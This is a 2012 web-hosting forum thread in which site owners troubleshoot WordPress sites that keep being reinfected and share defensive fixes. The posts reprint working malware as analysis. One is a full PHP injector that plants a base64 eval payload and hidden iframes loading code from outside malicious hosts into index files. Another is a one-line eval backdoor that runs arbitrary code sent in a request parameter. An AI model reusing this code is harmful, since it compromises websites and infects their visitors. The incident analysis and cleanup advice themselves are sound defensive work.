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

.... (shortened)
?>
    Code (markup):
    encoded, you get this:

    error_reporting(0);set_time_limit(0);
$paths = '/path/to/my/site/public_html/index.php';
$paths = explode(' | ',$paths);
$frame_old='# *(eval\(base64_decode\(.+\)\);)|(<iframe.+</iframe>)#i';
$frame_new_php='eval(base64_decode(\'ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x0am54bXJyY28uY28udHYvaS5waHA/Z289MSIgd2lkdGg9IjMiIGhlaWdodD0iMyI+PC9pZnJhbWU+PC9kaXY+JzsNCn0=\'));';
$frame_new_htm = '<iframe src="http://yampdfqc.co.tv/i.php?go=1" width="1" height="1"></iframe>';
foreach($paths as $path) {
	$path = trim($path);
	if(!is_writable($path)) continue;
	$filetime=filemtime ($path);
	$fd=fopen($path,"r");
	$buffer=fread($fd, filesize($path));
	fclose($fd);
	$buffer=preg_replace($frame_old,'',$buffer);
	if (strpos($path,'.php')!==false)
		$buffer=preg_replace('#<\?php#i', '<?php '.$frame_new_php , $buffer , 1);
	else
		$buffer=preg_replace('#<body[^>]*>#i', '\\0'.$frame_new_htm , $buffer , 1);
	$fd=fopen($path, "w");
	fwrite($fd, $buffer);
	fclose($fd);
	touch ($path , $filetime);
}
die('1111CHECKSTRING1111');
    Code (markup):
    this is pretty nasty shit which was posted online few months ago - it basically goes through all your index.php files on the server and injects the remote code to it.

    however i have disabled passthru function in php configuration so this shouldnt be the problem, and the request is almost 1 week old so there must be something else :/
     
    dev22, Jan 23, 2012 IP
  4. dev22

    dev22 Well-Known Member

    Messages:
    153
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    103
    #4
    this is still happening, even if you remove the script from index.php it will return in ~30 minutes. this means there is still some infected file on the server which is repeatedly inserting the evil code to index.php files. i havent been able to find this file yet.

    the only prevention seems to be chmoding index.php to 444 which prevents it from happening.
     
    dev22, Jan 23, 2012 IP
  5. SolidShellSecurity

    SolidShellSecurity Banned

    Messages:
    262
    Likes Received:
    3
    Best Answers:
    1
    Trophy Points:
    45
    #5
    Interesting... not seen this happen to any wordpress blogs that we host yet since it's probably being blocked by our settings. But if get time will look into how WP is being exploited.
     
    SolidShellSecurity, Jan 23, 2012 IP
  6. WebCare||360

    WebCare||360 Member

    Messages:
    124
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    46
    #6
    You need to take proper care of your security for your blog. This malicious code attack is very in these days.
     
    WebCare||360, Jan 24, 2012 IP
  7. mattyv

    mattyv Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #7
    I'm also having the same exact issue with all the sites on my server. Originally deleted the eval() from the index files but of course it came back.

    I'm at a loss for what to do and stressing out over this big time. Has anyone been able to figure this out yet?
     
    mattyv, Jan 24, 2012 IP
  8. SolidShellSecurity

    SolidShellSecurity Banned

    Messages:
    262
    Likes Received:
    3
    Best Answers:
    1
    Trophy Points:
    45
    #8
    You can block the attacks via mod_sec. That how is how we do it.
     
    SolidShellSecurity, Jan 24, 2012 IP
  9. minut

    minut Peon

    Messages:
    12
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #9
    I'm also having this same hack problem... tsktsk... will watch this thread
     
    minut, Jan 25, 2012 IP
  10. dev22

    dev22 Well-Known Member

    Messages:
    153
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    103
    #10
    mod_sec is not really a solution if you run nginx as your server...
     
    dev22, Jan 25, 2012 IP
  11. dev22

    dev22 Well-Known Member

    Messages:
    153
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    103
    #11
    ok guys i found out the problem.

    look through your logs for any accesses to file "wp-content/themes/XXXXXXX/functions.php".

    if someone is accessing this file directly its the hacker/bot - there is no reason to access this file directly.

    i checked this file and there was the evil code allowing remote access and running basically any command on server:

    eval (base64_decode ("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIExwVWc1eGJZZVFBQVk5ICov"));
    Code (markup):
    decoded:

    if (isset($_REQUEST['asc'])) { eval(stripslashes($_REQUEST['asc'])); exit; }/* LpUg5xbYeQAAY9 */
    Code (markup):
    i wasnt able to find this before because i was looking for string "eval(base64" and this one has space between those two functions.. "eval (base64)".

    so to fix your problem, use "find" command in your shell and look through all php files for either "$_REQUEST['asc']" or "eval (base64" and you should find the infected files. in my case its functions.php file in the theme folder but it can be any other file probably.

    the problem still is, how the hell did the attacker inserted this string into functions.php in the first time.

    anyway it seems to be solved for now, good luck with your sites!
     
    dev22, Jan 25, 2012 IP
  12. BigTim3

    BigTim3 Guest

    Messages:
    266
    Likes Received:
    1
    Best Answers:
    2
    Trophy Points:
    0
    #12
    BigTim3, Jan 25, 2012 IP
  13. dev22

    dev22 Well-Known Member

    Messages:
    153
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    103
    #13
    dev22, Jan 25, 2012 IP
  14. InstantLinkStorm

    InstantLinkStorm Peon

    Messages:
    19
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #14
    Had similiar problem turned out that virus was effecting thorough FTP program on my PC - this could explain why all 50 of your sites were compromised if you use an FTP program

    Details from sucri site check.

    "Description:

    A hidden and malicious iframe was identified. This malware infects a web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the site.

    Note that every PHP, HTML and JS file gets compromised by this malware.

    Affecting: Any web site with FTP enabled (and password stolen).

    Clean up: The desktop must be cleaned first. Use multiple AVs if necessary, since this virus is very good at hiding from the current AV that is running. Once it is clean, then you can clean up the sites and change the passwords.

    Loads malware from multiple sources: "
     
    InstantLinkStorm, Jan 31, 2012 IP
  15. earnnet

    earnnet Member

    Messages:
    100
    Likes Received:
    0
    Best Answers:
    1
    Trophy Points:
    26
    #15
    You should use chmod on some files in order to revoke the writing permissions for hackers. I guess you forgot that after installation - just an idea.
     
    earnnet, Jan 31, 2012 IP
  16. ShayneSherman

    ShayneSherman Peon

    Messages:
    93
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #16
    I have been dealing with the same issue now on my server for over a week. Well today I was looking at server logs, and noticed that someone from China was logging into one of Wordpress sites over 3000 times in the last week! I think he had an automated script that logged into my website and then somehow through an exploit was changing the index.php and index.html files on ALL of my websites. I changed the password to the website and blocked his IP. Check your server logs and see if you have a weird IP address hitting one of your ../wp-admin file.
     
    ShayneSherman, Feb 3, 2012 IP
  17. NZCloudHosting

    NZCloudHosting Peon

    Messages:
    97
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #17
    Its not a new exploit FYI.
     
    NZCloudHosting, Feb 3, 2012 IP
  18. dev22

    dev22 Well-Known Member

    Messages:
    153
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    103
    #18
    InstantLinkStorm, i think this has nothing to do with virus on my computer, i have multiple ftp logins and only this one was affected.

    earnnet, as i said, i turned those files to chmod 444 however its not a solution - i need to edit them from time to time too and changing it back to 644 or more for editing and then back to 444 is kind of annoying...
     
    dev22, Feb 4, 2012 IP
  19. ShayneSherman

    ShayneSherman Peon

    Messages:
    93
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #19
    Dev did you check your server logs to see if one of your site's logins were compromised? I too had multiple ftp logins AND multiple cpanels on my server. Only 1 that got hacked was the one with the website that the login had been compromised. I have changed that password and blocked the IP for the user that was accessing it (from china and accessed my wp-admin over 3000 times). Since I made those changes my files haven't been changed. I think I got it.
     
    ShayneSherman, Feb 4, 2012 IP
  20. HostingLynx

    HostingLynx Active Member

    Messages:
    106
    Likes Received:
    1
    Best Answers:
    1
    Trophy Points:
    83
    Articles:
    10
    #20
    Ya alot of wordpress blogs, mostly 3.2.1, were hacked to distribute the TDSS rootkit.
     
    HostingLynx, Feb 6, 2012 IP
Page 1 of 2